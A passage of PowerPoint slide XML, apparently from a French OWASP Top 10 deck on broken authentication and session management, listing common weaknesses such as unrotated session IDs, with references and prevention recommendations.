                </a:solidFill>
              </a:rPr>
              <a:t>Pas de timeout des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de session ou mauvaise désactivation des sessions ou jetons d’authentification, en particulier SSO lors de la déconnexion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Non rotation des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de session après connexion réussie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les mots de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, IDs de session et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>transitent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>canaux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chiffrés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> A6.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Veuillez consulter les sections V2 et V3 de l'exigence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ASVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour plus de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>détails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>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en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Références</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour plus de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>détails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exigences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>problèmes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>éviter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domaine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>voir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>exigences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>vérification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> ASVS pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>l’Authentification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> (V2) et la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Gestion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> de Sessions (V3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Authentication Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Forgot Password Cheat Sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP Session Management Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Development Guide: Chapter on Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Chapter on Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Références</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>externes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId11"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE Entry 287 on Improper Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE Entry 384 on Session Fixation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="35814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ts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pP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Comment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>puis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>empêcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La recommandation première pour une entreprise est de rendre accessible aux développeurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un ensemble unique de contrôles d'authentification et de gestion de sessions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ces contrôles doivent veiller à</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>satisfaire aux exigences de vérification d'authentification (V2) et de gestion de session (V3) définies dans le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Standard de Vérification de la Sécurité des Applications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ASVS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
